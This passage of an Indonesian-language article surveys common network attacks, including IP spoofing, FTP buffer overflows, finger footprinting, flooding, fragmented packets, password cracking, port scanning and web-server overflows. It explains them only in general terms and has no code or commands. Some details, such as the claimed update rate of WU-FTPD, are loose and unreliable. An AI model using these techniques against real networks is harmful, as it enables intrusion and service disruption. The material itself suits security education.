IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.
2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflowMengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.
3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem.
Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.
4. Flooding & Broadcasting
Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or/volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.
5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.
6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).
7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).
8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP.Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebnayakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.
9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.
10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network). Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.
11. Remote File System Attack
Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.
12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ☺) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.
13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebagai contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet Interception
TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.
15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods. HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai.
Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.